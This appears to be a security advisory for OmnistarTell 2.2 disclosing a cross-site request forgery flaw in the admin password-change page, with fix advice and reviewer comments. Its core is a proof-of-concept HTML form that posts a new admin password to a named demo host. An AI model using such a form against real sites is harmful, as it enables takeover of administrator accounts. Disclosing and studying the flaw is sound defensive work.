< ------------------- header data start ------------------- >

#############################################################

# Application Name :OmnistarTell

# Version : 2.2

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Uzaktan otomatik olarak admin bilgileri degistirilebilir. (EN: The admin account details can be changed remotely and automatically.)

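# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (EN: A session key (session token) should be added to the form, and the old password should be required.)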

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end ------------------- >

< -- bug code start -- >
<!--
  Request shape documented by this advisory: a POST to admin/password.php whose body
  carries only f_password, f_password2 and the submit field check=update.
  Review point: the form as listed contains no hidden per-session token field and no
  current-password field, so nothing in the request body separates a deliberate
  submission by the administrator from one initiated by a third-party page
  (presumably riding on the administrator's existing session; confirm against the handler).
  This is what the advisory header's fix advice addresses: add a session token to the
  form and require the old password.
  NOTE(review): server-side checks (token comparison, Origin/Referer validation,
  SameSite cookie settings) are not visible in this listing; verify in password.php.
  NOTE(review): the ’ characters around some attribute values are typographic quotes,
  presumably a publishing artifact; they are left exactly as published.
-->
<form action=http://demo.hostcontroladmin.com/demo_tell3/admin/password.php method=post><table width=100% border=1 cellpadding=0 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’>
<tr valign=top>
<td height=21 align=center valign=middle nowrap background=../images/title_bg.jpg class=Arial12Grey><div align=left><b></b></div></td>

</tr>
</table>
<table width=100% border=0 cellspacing=0 cellpadding=0>
<tr>
<td><img src=../images/spacer.gif width=1 height=1></td>
</tr>
</table>
<!--
  The new password and its confirmation are the only user-supplied values in the form.
  A corrected form would add, alongside these inputs, a hidden anti-CSRF token bound to the
  session and a current-password input, with both verified server-side before the change
  is applied.
-->
<table width=722 border=1 cellpadding=5 cellspacing=0 bordercolor=#CCCCCC style=’border-collapse:collapse;’><tr bgcolor=#f4f4f4><td class=Arial11Grey> * New password: </td><td class=Arial11Blue><input type=password name=’f_password’ value= ></td></tr>

<tr bgcolor=#f4f4f4><td class=Arial11Grey>* Confirm password: </td><td class=Arial11Blue><input type=password name=’f_password2’ value= ></td></tr>
<!-- Submit control; its name/value pair (check=update) is sent with the two password fields. -->
<tr bgcolor=f4f4f4><td colspan=2 class=Arial11Grey align=left><input type=submit name=check value=’update’></td></tr>
</table></form>

< -- bug code end -- >